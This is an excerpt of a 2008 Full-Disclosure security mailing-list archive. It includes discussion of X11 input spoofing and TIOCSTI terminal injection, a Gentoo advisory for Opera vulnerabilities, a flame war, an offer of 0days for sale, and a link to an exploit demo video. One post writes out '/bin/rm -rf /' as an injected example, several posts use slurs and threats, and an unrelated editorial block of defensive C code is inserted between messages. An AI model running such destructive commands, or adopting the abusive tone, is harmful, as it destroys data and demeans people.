was generated by another program rather than directly by the user. The mighty xterm knows to ignore such events and offers me a "secure input mode" where it grabs the keyboard so it can bypass any filtering programs (such as my window manager, which filters out Ctrl-T as the command key, and generates a synthetic Ctrl-T for the "Ctrl-T t" sequence).

Now, people have felt the desire to automate various tasks in secure applications, and created the XTest extension that allows a client that knows about the extension to generate events with "synthetic" set to false.

The danger is not that any of the technologies here is inherently insecure, it is that their combination is. And this is the way to more secure computing: isolation by default. Of course, that is not "convergence", not "Web 2.0". And certainly not sexy.

Simon
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 315 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/a09fdd5c/attachment.bin

From mcwidget at gmail.com Mon Nov 3 16:39:15 2008
From: mcwidget at gmail.com (mcwidget)
Date: Mon, 3 Nov 2008 16:39:15 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
References: <0eba01c93dbd$40135988$7a46a8c0@cc.w2k.vt.edu>
Message-ID: <4e324cb0811030839s3388ab5fve04ba7b546b185a2@mail.gmail.com>

>
> The suggestion you made mcwidget is pretty much (I'm very sad to agree)
> 'just not worth it'...
>

Like I said, there are problems with this :)

My original point, which has become a bit lost in this discussion, was that 'fixing the user' is a very difficult goal to achieve and other methods to improve home PC security should be looked at.
The suggestion of a 'NAP enabled router' was meant as an example of how other devices in the home that users are less likely to 'screw around with' could be used to increase the overall security of the user . NAP may or may not be helpful here but there may be ways that the home router could be utilised better? This is getting offtopic for FD though. Happy to continue this off list. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/8b9f642e/attachment.html From xploitable at gmail.com Mon Nov 3 17:00:05 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 3 Nov 2008 17:00:05 +0000 Subject: [Full-disclosure] Securing our computers? In-Reply-To: References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> Message-ID: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> i have a power base of nearly 5000 members on the n3td3v mailing list, and i don't work for the government but i very much believe in what the uk intelligence services are doing. so i suggest you don't fuck with n3td3v but its your choice at the end of the day. thank you and good day. On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote: > tl;dr > > now i am going back to my real job, doing real things and you can go back to > playing with lego and waiting for your mother to bring in some sandwiches > cut into triangles. without the crust. > > faggot. > From rysheve at gmail.com Mon Nov 3 17:13:09 2008 From: rysheve at gmail.com (Chris Jeane) Date: Mon, 3 Nov 2008 11:13:09 -0600 Subject: [Full-disclosure] Securing our computers? In-Reply-To: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> Message-ID: "Power Base of nearly 5000 members"?!? "i suggest you don't fuck with n3td3v"?1?!? Are you a super villian? 
On Mon, Nov 3, 2008 at 11:00 AM, n3td3v wrote: > i have a power base of nearly 5000 members on the n3td3v mailing list, > and i don't work for the government but i very much believe in what > the uk intelligence services are doing. so i suggest you don't fuck > with n3td3v but its your choice at the end of the day. thank you and > good day. > > On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote: > > tl;dr > > > > now i am going back to my real job, doing real things and you can go back > to > > playing with lego and waiting for your mother to bring in some sandwiches > > cut into triangles. without the crust. > > > > faggot. > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/d65521de/attachment.html From Valdis.Kletnieks at vt.edu Mon Nov 3 17:20:47 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 03 Nov 2008 12:20:47 -0500 Subject: [Full-disclosure] Securing our computers? In-Reply-To: Your message of "Mon, 03 Nov 2008 15:42:02 +0100." <20081103144201.GA3847@richter> References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <20081103144201.GA3847@richter> Message-ID: <82823.1225732847@turing-police.cc.vt.edu> On Mon, 03 Nov 2008 15:42:02 +0100, Simon Richter said: > For example, when the X Window System reports an input event to an > application, a flag tells the app whether the event is "synthetic", i.e. > was generated by another program rather than directly by the user. 
> The mighty xterm knows to ignore such events and offers me a "secure input
> mode" where it grabs the keyboard so it can bypass any filtering programs
> (such as my window manager, which filters out Ctrl-T as the command key,
> and generates a synthetic Ctrl-T for the "Ctrl-T t" sequence).
>
> Now, people have felt the desire to automate various tasks in secure
> applications, and created the XTest extension that allows a client that
> knows about the extension to generate events with "synthetic" set to false.

And the worst part is that the people who designed that either knew, or should have known, about the large number of Unix vulnerabilities in the pre-X, ascii-green-screen world 5 years or so before, which all basically boiled down to:

1) Detach yourself from the current terminal
2) Open a victim's terminal (and thus inheriting that terminal as your "control terminal")
3) Use the TIOCSTI ioctl to input characters as if typed on the control terminal. "/bin/rm -rf / \n" or similar.

It turns out that making the terminal mode 0600 when the user logs in isn't always sufficient, due to how difficult it is to create a working revoke().

Oh - the original use for TIOCSTI was semi-reasonable - it was so that programs like /usr/bin/mail could pre-populate a To: or cc: line for you as if you had entered it, and then you could use the line-editing characters for any changes you wanted to make...

Google for 'TIOCSTI' 'security' for some of the gory details.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/001c75d6/attachment.bin

From xploitable at gmail.com Mon Nov 3 17:34:22 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 17:34:22 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> Message-ID: <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com> im not a criminal... you seem to have your wires crossed. On Mon, Nov 3, 2008 at 5:13 PM, Chris Jeane wrote: > "Power Base of nearly 5000 members"?!? "i suggest you don't fuck > with n3td3v"?1?!? > > Are you a super villian? > > On Mon, Nov 3, 2008 at 11:00 AM, n3td3v wrote: >> >> i have a power base of nearly 5000 members on the n3td3v mailing list, >> and i don't work for the government but i very much believe in what >> the uk intelligence services are doing. so i suggest you don't fuck >> with n3td3v but its your choice at the end of the day. thank you and >> good day. >> >> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote: >> > tl;dr >> > >> > now i am going back to my real job, doing real things and you can go >> > back to >> > playing with lego and waiting for your mother to bring in some >> > sandwiches >> > cut into triangles. without the crust. >> > >> > faggot. >> > >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From anonymouspimp at gmail.com Mon Nov 3 17:31:18 2008 From: anonymouspimp at gmail.com (anonymous pimp) Date: Mon, 3 Nov 2008 19:31:18 +0200 Subject: [Full-disclosure] Odays offers In-Reply-To: References: Message-ID: <2d792fb20811030931u5499bbeelb46bd184f56566fd@mail.gmail.com> You're proposing them? You're suggesting them? There's no question, what do you expect us to answer privately? 
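Editorial example for the Bitsec tmail/dmail advisory earlier in this digest: the unbounded strcpy() of the folder part into tmp[MAILTMPLEN], redone with a length check before anything is copied or modified. This is an added example, not part of any message in this archive and not the fix shipped in UW IMAP 2007d or Panda IMAP; the function names split_user_folder, copy_upper, is_inbox and split_oversized_demo, and the MAILTMPLEN value of 1024, are assumptions made for the example.

```c
/* Added example: bounded handling of the "user+folder" delivery argument. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAILTMPLEN 1024          /* assumed buffer size for this example */

enum { SPLIT_OK = 0, SPLIT_TOO_LONG = -1 };

/* Case-insensitive test for "INBOX" that needs no scratch copy at all. */
int is_inbox(const char *s)
{
    static const char inbox[] = "INBOX";
    size_t i;

    for (i = 0; inbox[i] != '\0'; i++)
        if (toupper((unsigned char)s[i]) != inbox[i])
            return 0;            /* also stops at a short string's NUL */
    return s[i] == '\0';
}

/*
 * Bounded stand-in for the ucase(strcpy(tmp, folder)) idiom, for callers
 * that really need an upper-cased copy. Input that does not fit, terminator
 * included, is refused instead of being written past the end of dst.
 */
int copy_upper(char *dst, size_t dstlen, const char *src)
{
    size_t i, n = strlen(src);

    if (dstlen == 0 || n >= dstlen)
        return SPLIT_TOO_LONG;
    for (i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[n] = '\0';
    return SPLIT_OK;
}

/*
 * Split "user+folder" in place. On success arg holds the user name and
 * *folder points at the folder part, or is NULL for "user", "user+" and
 * "user+INBOX". The length is checked before arg is modified, so a
 * rejected argument is left intact for logging.
 */
int split_user_folder(char *arg, char **folder)
{
    char *plus = strchr(arg, '+');

    *folder = NULL;
    if (plus == NULL)
        return SPLIT_OK;
    if (strlen(plus + 1) >= MAILTMPLEN)
        return SPLIT_TOO_LONG;
    *plus++ = '\0';
    if (*plus != '\0' && !is_inbox(plus))
        *folder = plus;
    return SPLIT_OK;
}

/* Constructed oversized input: a folder part longer than MAILTMPLEN. */
int split_oversized_demo(void)
{
    static char arg[MAILTMPLEN + 16];
    char *folder;

    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    memcpy(arg, "bob+", 4);
    return split_user_folder(arg, &folder);
}

int main(void)
{
    /* Constructed sample arguments. */
    char a[] = "alice+lists", b[] = "alice+inbox", c[] = "alice";
    char *cases[] = { a, b, c };
    char *folder;
    size_t i;

    for (i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int rc = split_user_folder(cases[i], &folder);
        printf("rc=%d user=%s folder=%s\n", rc, cases[i],
               folder ? folder : "(INBOX)");
    }
    printf("oversized folder: rc=%d\n", split_oversized_demo());
    return 0;
}
```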
From xploitable at gmail.com Mon Nov 3 18:43:17 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 3 Nov 2008 18:43:17 +0000 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> Message-ID: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> ---------- Forwarded message ---------- From: n3td3v Date: Mon, Nov 3, 2008 at 1:15 PM Subject: 0day auctions, should they be outlawed? To: n3td3v i'll be lobbying soon to outlaw 0day auctions, this means the banning of 0day sales on the internet. i've noticed an increased level in 0day sales lately on mailing lists, and web sites... i think this should be against the law. let me know what your opinions are on this, so i can form what im going to say when i lobby people about it. cheers. From xploitable at gmail.com Mon Nov 3 18:59:05 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 3 Nov 2008 18:59:05 +0000 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <20081103184957.GB5218@mail.msys.ch> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> <20081103184957.GB5218@mail.msys.ch> Message-ID: <4b6ee9310811031059lfa45b3du78f914064f713d2a@mail.gmail.com> On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote: > * n3td3v wrote: >> ---------- Forwarded message ---------- >> From: n3td3v >> Date: Mon, Nov 3, 2008 at 1:15 PM >> Subject: 0day auctions, should they be outlawed? >> To: n3td3v >> >> >> i'll be lobbying soon to outlaw 0day auctions, this means the banning >> of 0day sales on the internet. i've noticed an increased level in 0day >> sales lately on mailing lists, and web sites... i think this should be >> against the law. 
let me know what your opinions are on this, so i can >> form what im going to say when i lobby people about it. cheers. > > wrong approach. there should be a law that the state has to buy > all 0days and publish them here on undisclosure. that would be > good use of tax money... ;) > the latest guy put up an alias that says "anti security" and i guess demanded money to make the 0day be known, and then there is still no guarantee that the affected vendor or the government is going to get wind of the exploit. that means, there is going to need to be a government task force in place to infiltrate these sales, to make sure the good guys are getting the info before blackhat elements. is there already a government strike force in place to buy these "0day offers"? or are the government sitting on their hand as per usual? im becoming increasingly frustrated about what is going on. cheers. From bigsandyvagina at gmail.com Mon Nov 3 18:54:20 2008 From: bigsandyvagina at gmail.com (Sandy Vagina) Date: Mon, 3 Nov 2008 10:54:20 -0800 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> Message-ID: And by "lobbying", you mean continuing to whine on the full-disclosure list? Sandy On 11/3/08, n3td3v wrote: > i'll be lobbying soon to outlaw 0day auctions, this means the banning > of 0day sales on the internet. i've noticed an increased level in 0day > sales lately on mailing lists, and web sites... i think this should be > against the law. let me know what your opinions are on this, so i can > form what im going to say when i lobby people about it. cheers. 
From debasis.mohanty.listmails at gmail.com Mon Nov 3 18:58:39 2008 From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty) Date: Tue, 4 Nov 2008 00:28:39 +0530 Subject: [Full-disclosure] RealPlayer ierpplug.dll ActiveX Control BO (CVE-2007-5601) Exploit Message-ID: <490f49e9.034c6e0a.1932.2998@mx.google.com> Although can't release the exploit code for obvious reasons but thought of putting a video will be a good thing. Check for a bindshell exploit demo for RealPlayer ierpplug.dll ActiveX Control BO (CVE-2007-5601) vulnerability: http://coffeeandsecurity.com/resources.aspx -d From marc at msys.ch Mon Nov 3 18:49:57 2008 From: marc at msys.ch (Marc Balmer) Date: Mon, 3 Nov 2008 19:49:57 +0100 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> Message-ID: <20081103184957.GB5218@mail.msys.ch> * n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Mon, Nov 3, 2008 at 1:15 PM > Subject: 0day auctions, should they be outlawed? > To: n3td3v > > > i'll be lobbying soon to outlaw 0day auctions, this means the banning > of 0day sales on the internet. i've noticed an increased level in 0day > sales lately on mailing lists, and web sites... i think this should be > against the law. let me know what your opinions are on this, so i can > form what im going to say when i lobby people about it. cheers. wrong approach. there should be a law that the state has to buy all 0days and publish them here on undisclosure. that would be good use of tax money... 
;)

From keytoaster at gentoo.org Mon Nov 3 18:50:10 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Mon, 03 Nov 2008 19:50:10 +0100
Subject: [Full-disclosure] [ GLSA 200811-01 ] Opera: Multiple vulnerabilities
Message-ID: <490F47E2.7020903@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200811-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Opera: Multiple vulnerabilities
      Date: November 03, 2008
      Bugs: #235298, #240500, #243060, #244980
        ID: 200811-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Opera, allowing for the execution of arbitrary code.

Background
==========

Opera is a fast web browser that is available free of charge.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  www-client/opera       < 9.62                              >= 9.62

Description
===========

Multiple vulnerabilities have been discovered in Opera:

* Opera does not restrict the ability of a framed web page to change the address associated with a different frame (CVE-2008-4195).

* Chris Weber (Casaba Security) discovered a Cross-site scripting vulnerability (CVE-2008-4196).

* Michael A. Puls II discovered that Opera can produce argument strings that contain uninitialized memory, when processing custom shortcut and menu commands (CVE-2008-4197).

* Lars Kleinschmidt discovered that Opera, when rendering an HTTP page that has loaded an HTTPS page into a frame, displays a padlock icon and offers a security information dialog reporting a secure connection (CVE-2008-4198).
* Opera does not prevent use of links from web pages to feed source files on the local disk (CVE-2008-4199).

* Opera does not ensure that the address field of a news feed represents the feed's actual URL (CVE-2008-4200).

* Opera does not check the CRL override upon encountering a certificate that lacks a CRL (CVE-2008-4292).

* Chris (Matasano Security) reported that Opera may crash if it is redirected by a malicious page to a specially crafted address (CVE-2008-4694).

* Nate McFeters reported that Opera runs Java applets in the context of the local machine, if that applet has been cached and a page can predict the cache path for that applet and load it from the cache (CVE-2008-4695).

* Roberto Suggi Liverani (Security-Assessment.com) reported that Opera's History Search results does not escape certain constructs correctly, allowing for the injection of scripts into the page (CVE-2008-4696).

* David Bloom reported that Opera's Fast Forward feature incorrectly executes scripts from a page held in a frame in the outermost page instead of the page the JavaScript URL was located (CVE-2008-4697).

* David Bloom reported that Opera does not block some scripts when previewing a news feed (CVE-2008-4698).

* Opera does not correctly sanitize content when certain parameters are passed to Opera's History Search, allowing scripts to be injected into the History Search results page (CVE-2008-4794).

* Opera's links panel incorrectly causes scripts from a page held in a frame to be executed in the outermost page instead of the page where the URL was located (CVE-2008-4795).

Impact
======

These vulnerabilities allow remote attackers to execute arbitrary code, to run scripts injected into Opera's History Search with elevated privileges, to inject arbitrary web script or HTML into web pages, to manipulate the address bar, to change Opera's preferences, to determine the validity of local filenames, to read cache files, browsing history, and subscribed feeds or to conduct other attacks.
Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Opera users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/opera-9.62"

References
==========

  [ 1 ] CVE-2008-4195
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4195
  [ 2 ] CVE-2008-4196
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4196
  [ 3 ] CVE-2008-4197
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197
  [ 4 ] CVE-2008-4198
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4198
  [ 5 ] CVE-2008-4199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4199
  [ 6 ] CVE-2008-4200
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4200
  [ 7 ] CVE-2008-4292
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4292
  [ 8 ] CVE-2008-4694
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4694
  [ 9 ] CVE-2008-4695
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4695
  [ 10 ] CVE-2008-4696
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4696
  [ 11 ] CVE-2008-4697
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4697
  [ 12 ] CVE-2008-4698
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4698
  [ 13 ] CVE-2008-4794
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4794
  [ 14 ] CVE-2008-4795
         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4795

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200811-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/35efa626/attachment.bin From ureleet at gmail.com Mon Nov 3 19:19:59 2008 From: ureleet at gmail.com (Ureleet) Date: Mon, 3 Nov 2008 14:19:59 -0500 Subject: [Full-disclosure] Securing our computers? In-Reply-To: <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> Message-ID: <6158bb410811031119le633df7v7eace516aa270a48@mail.gmail.com> u actually had a descent thread going there andrew! congratz! then u tried to stick ur "5000 member n3td3v mailing list" dick out there and u fucked it up. shutup about ur little mailing list. goddamn it. its all ppl watching you 2 see what moronic shit u r going 2 say next. damn it, why do u have to fuck up every discussion!? On Mon, Nov 3, 2008 at 12:00 PM, n3td3v wrote: > i have a power base of nearly 5000 members on the n3td3v mailing list, > and i don't work for the government but i very much believe in what > the uk intelligence services are doing. so i suggest you don't fuck > with n3td3v but its your choice at the end of the day. thank you and > good day. > > On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote: >> tl;dr >> >> now i am going back to my real job, doing real things and you can go back to >> playing with lego and waiting for your mother to bring in some sandwiches >> cut into triangles. without the crust. >> >> faggot. >> > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Nov 3 19:17:46 2008 From: ureleet at gmail.com (Ureleet) Date: Mon, 3 Nov 2008 14:17:46 -0500 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com> <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com> Message-ID: <6158bb410811031117t637e8281hd2529d81f311009b@mail.gmail.com> they wont be, and they cant be outlawed. fight a fight worth fighting. cause this is 1 u cant. On Mon, Nov 3, 2008 at 1:43 PM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Mon, Nov 3, 2008 at 1:15 PM > Subject: 0day auctions, should they be outlawed? > To: n3td3v > > > i'll be lobbying soon to outlaw 0day auctions, this means the banning > of 0day sales on the internet. i've noticed an increased level in 0day > sales lately on mailing lists, and web sites... i think this should be > against the law. let me know what your opinions are on this, so i can > form what im going to say when i lobby people about it. cheers. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Nov 3 19:24:16 2008 From: ureleet at gmail.com (Ureleet) Date: Mon, 3 Nov 2008 14:24:16 -0500 Subject: [Full-disclosure] Comments on: Security Bites 119: Does the Internet need its own Interpol? 
In-Reply-To: <4b6ee9310810241755q1eb09da2j5d6637a44b284c14@mail.gmail.com> References: <4b6ee9310810241540j61ad1c65m383a66eb21c44af2@mail.gmail.com> <4b6ee9310810241610u709d5d88p15b9d1c2924a97ca@mail.gmail.com> <296a304a0810241635u3c7564d5s8e0fa31e0f132935@mail.gmail.com> <4b6ee9310810241755q1eb09da2j5d6637a44b284c14@mail.gmail.com> Message-ID: <6158bb410811031124m79fe462ci63dff71bfb1d6b08@mail.gmail.com> stop deflecting. On Fri, Oct 24, 2008 at 7:55 PM, n3td3v wrote: > can we get back to talking about the interpol idea and less about who > is a troll and who isn't, let's stay focused. > > On Sat, Oct 25, 2008 at 12:35 AM, waveroad waveroad wrote: >> why do you troll the fd dude ? >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Nov 3 19:21:52 2008 From: ureleet at gmail.com (Ureleet) Date: Mon, 3 Nov 2008 14:21:52 -0500 Subject: [Full-disclosure] Securing our computers? In-Reply-To: <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com> References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com> <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com> Message-ID: <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com> no, but u r insane. http://www.ubergeek.tv/article.php?pid=54 id say this was n3td3v, but i dont think hes that cool hes n3td3v, and hes a supervillian. btw -- it was nice and sane and quiet on the list for like a week without you here. go back 2 wherever you were. On Mon, Nov 3, 2008 at 12:34 PM, n3td3v wrote: > im not a criminal... you seem to have your wires crossed. > > On Mon, Nov 3, 2008 at 5:13 PM, Chris Jeane wrote: >> "Power Base of nearly 5000 members"?!? "i suggest you don't fuck >> with n3td3v"?1?!? >> >> Are you a super villian? 
>>
>> On Mon, Nov 3, 2008 at 11:00 AM, n3td3v wrote:
>>>
>>> i have a power base of nearly 5000 members on the n3td3v mailing list,
>>> and i don't work for the government but i very much believe in what
>>> the uk intelligence services are doing. so i suggest you don't fuck
>>> with n3td3v but its your choice at the end of the day. thank you and
>>> good day.
>>>
>>> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote:
>>> > tl;dr
>>> >
>>> > now i am going back to my real job, doing real things and you can go
>>> > back to
>>> > playing with lego and waiting for your mother to bring in some
>>> > sandwiches
>>> > cut into triangles. without the crust.
>>> >
>>> > faggot.
>>> >

From ureleet at gmail.com Mon Nov 3 19:22:27 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:22:27 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To:
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
Message-ID: <6158bb410811031122r6378d453kf973c9e99c79318b@mail.gmail.com>

sounds like he was threatening u 2 me? isnt that what he yells at everyone else for?

On Mon, Nov 3, 2008 at 12:13 PM, Chris Jeane wrote:
> "Power Base of nearly 5000 members"?!? "i suggest you don't fuck
> with n3td3v"?1?!?
>
> Are you a super villain?
>
> On Mon, Nov 3, 2008 at 11:00 AM, n3td3v wrote:
>>
>> i have a power base of nearly 5000 members on the n3td3v mailing list,
>> and i don't work for the government but i very much believe in what
>> the uk intelligence services are doing. so i suggest you don't fuck
>> with n3td3v but its your choice at the end of the day. thank you and
>> good day.
>>
>> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee wrote:
>> > tl;dr
>> >
>> > now i am going back to my real job, doing real things and you can go
>> > back to
>> > playing with lego and waiting for your mother to bring in some
>> > sandwiches
>> > cut into triangles. without the crust.
>> >
>> > faggot.
>> >

From xploitable at gmail.com Mon Nov 3 19:24:41 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 19:24:41 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To:
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
    <4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
Message-ID: <4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com>

who cares what it means, people are angry, there better be a government task / strike force being setup for when these offers come in front of everyone. we can't be complacent about the dangers of these exploits getting bought by the bad guys. moreover, they shouldn't be allowed to hold people to ransom when security is at stake. ultimately they need to be outlawed, and if they can't be, then second best is a 24 hour on stand by task /strike force.

On Mon, Nov 3, 2008 at 6:54 PM, Sandy Vagina wrote:
> And by "lobbying", you mean continuing to whine on the full-disclosure list?
>
> Sandy
>
> On 11/3/08, n3td3v wrote:
>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>> of 0day sales on the internet. i've noticed an increased level in 0day
>> sales lately on mailing lists, and web sites... i think this should be
>> against the law. let me know what your opinions are on this, so i can
>> form what im going to say when i lobby people about it. cheers.
>

From ureleet at gmail.com Mon Nov 3 19:23:45 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:23:45 -0500
Subject: [Full-disclosure] Odays offers
In-Reply-To:
References:
Message-ID: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>

i haz an idea. report them to the fucking vendors, like you are supposed to you shitass. or to uscert. or, heres an idea, fucking post them on FD. Isn't that what FD is for?

On Mon, Nov 3, 2008 at 6:36 AM, anti security wrote:
> Dear people,
>
> I'm proposing some really interesting 0days for Windows && Linux. Please
> answer only by private email.
>
> See you soon
>

From william at lefkovics.net Mon Nov 3 19:29:47 2008
From: william at lefkovics.net (william at lefkovics.net)
Date: Mon, 3 Nov 2008 12:29:47 -0700
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
Message-ID: <43a365c5$17e8ef99$d9ff1b0$@com>

There should be a FD listing fee for the 0day so the list can garner a commission from the sale.

Absolutely no increase in government should be directed toward 0day sale prevention or enforcement.
The answer to these things rarely should include the words 'government', 'task' and 'force'.

----------------------------------------
From: "n3td3v"
Sent: Monday, November 03, 2008 11:00 AM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?

On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
